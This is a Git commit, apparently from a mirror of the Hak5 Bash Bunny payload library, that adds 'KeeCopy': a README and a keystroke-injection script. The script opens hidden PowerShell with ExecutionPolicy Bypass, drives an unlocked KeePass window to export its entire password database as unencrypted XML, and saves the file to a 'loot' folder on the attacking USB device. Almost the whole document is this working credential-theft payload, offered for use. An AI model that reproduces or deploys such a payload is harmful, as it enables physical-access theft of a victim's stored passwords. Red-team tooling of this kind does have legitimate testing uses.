mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Initial commit (#484)
This commit is contained in:
33
payloads/library/exfiltration/keecopy/README.md
Normal file
33
payloads/library/exfiltration/keecopy/README.md
Normal file
@@ -0,0 +1,33 @@
|
|||||||
|
# KeePass Automated Exporter
|
||||||
|
|
||||||
|
- Title: KeeCopy
|
||||||
|
- Author: jrwimmer
|
||||||
|
- Version: 1.0
|
||||||
|
- Target: Windows Vista+
|
||||||
|
- Category: Exfiltration
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
Performs keystroke automation to export an unencrypted copy of an unlocked KeePass database
|
||||||
|
The copy is saved to the loot folder on the Bash Bunny USB Mass Storage partition
|
||||||
|
|
||||||
|
Important Considerations:
|
||||||
|
|
||||||
|
This script makes the following assumptions.
|
||||||
|
- The target computer is unlocked
|
||||||
|
- The target computer has KeePass 2.x installed and running with an unlocked database
|
||||||
|
- KeePass only has one database open, or the desired database was the last one in focus
|
||||||
|
- KeePass is using the default "Show KeePass window" hot key of: `Ctrl + Alt + K`
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
|
||||||
|
Hot key settings and/or script tweaks may be necessary depending on the target system.
|
||||||
|
|
||||||
|
## STATUS
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
| -------- | ------------------------- |
|
||||||
|
| STAGE1 | Determine output location |
|
||||||
|
| STAGE2 | Export database |
|
||||||
|
| FINISH | Payload complete |
|
||||||
|
|
||||||
102
payloads/library/exfiltration/keecopy/payload.txt
Normal file
102
payloads/library/exfiltration/keecopy/payload.txt
Normal file
@@ -0,0 +1,102 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: KeeCopy
|
||||||
|
# Description: All-in-one script using keystroke automation to export an unencrypted copy of an unlocked KeePass database.
|
||||||
|
# The database copy is saved to the loot folder on the Bash Bunny USB Mass Storage partition
|
||||||
|
# Author: jrwimmer
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Exfiltration
|
||||||
|
# Target: Windows Vista+ (PowerShell, clip.exe)
|
||||||
|
# Attackmodes: HID, Storage
|
||||||
|
#
|
||||||
|
#
|
||||||
|
|
||||||
|
##################################
|
||||||
|
# Options #
|
||||||
|
##################################
|
||||||
|
|
||||||
|
# KEEPASS_SHOW (DUCKY KEY COMBO) - Specify the hot key combination anticipated to show the KeePass window
|
||||||
|
KEEPASS_SHOW="CTRL-ALT k"
|
||||||
|
|
||||||
|
# KEEPASS_WAITSAVE (MILLISECONDS) - How long to wait for KeePass to complete the export
|
||||||
|
KEEPASS_WAITSAVE=5000
|
||||||
|
|
||||||
|
# POWEROFF_AFTER (Y/N) - Power down the BashBunny upon completion
|
||||||
|
POWEROFF_AFTER="Y"
|
||||||
|
|
||||||
|
|
||||||
|
##################################
|
||||||
|
# Stage 1: Determine destination #
|
||||||
|
##################################
|
||||||
|
LED STAGE1
|
||||||
|
|
||||||
|
# Activate HID and STORAGE capabilities
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
|
||||||
|
# Open PowerShell
|
||||||
|
RUN WIN powershell.exe
|
||||||
|
QUACK DELAY 2000
|
||||||
|
|
||||||
|
# Locate the BashBunny volume and store it on the clipboard
|
||||||
|
QUACK STRING "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \"(gwmi win32_volume -Filter {label='BashBunny'}).Name\" | clip;exit"
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
##################################
|
||||||
|
# Stage 2: Export database #
|
||||||
|
##################################
|
||||||
|
LED STAGE2
|
||||||
|
|
||||||
|
# Open KeePass
|
||||||
|
QUACK $KEEPASS_SHOW
|
||||||
|
QUACK DELAY 500
|
||||||
|
|
||||||
|
# Open the File menu
|
||||||
|
QUACK ALT f
|
||||||
|
QUACK DELAY 100
|
||||||
|
|
||||||
|
# Select "Export"
|
||||||
|
QUACK e
|
||||||
|
QUACK DELAY 100
|
||||||
|
|
||||||
|
# Move focus into the format selector
|
||||||
|
QUACK TAB
|
||||||
|
QUACK TAB
|
||||||
|
|
||||||
|
# Skip down to "Customizable HTML File"
|
||||||
|
QUACK c
|
||||||
|
|
||||||
|
# Move up to "KeePass XML (2.x)"
|
||||||
|
QUACK UP
|
||||||
|
|
||||||
|
# Move focus to the Destination File field
|
||||||
|
QUACK TAB
|
||||||
|
|
||||||
|
# Paste the path copied in STAGE1
|
||||||
|
QUACK CTRL v
|
||||||
|
|
||||||
|
# Append the rest of the destination path
|
||||||
|
QUACK STRING "loot\KPDB-$(date +%Y%m%d-%k%M%S).xml"
|
||||||
|
|
||||||
|
# ...and export!
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
# Wait for KeePass to complete the export
|
||||||
|
QUACK DELAY $KEEPASS_WAITSAVE
|
||||||
|
|
||||||
|
##################################
|
||||||
|
# Cleanup #
|
||||||
|
##################################
|
||||||
|
LED CLEANUP
|
||||||
|
|
||||||
|
# Synchronize disks
|
||||||
|
SYNC
|
||||||
|
|
||||||
|
##################################
|
||||||
|
# Finish #
|
||||||
|
##################################
|
||||||
|
LED FINISH
|
||||||
|
|
||||||
|
# Power off
|
||||||
|
if [ $POWEROFF_AFTER == "Y" ]; then
|
||||||
|
halt --poweroff
|
||||||
|
fi
|
||||||
Reference in New Issue
Block a user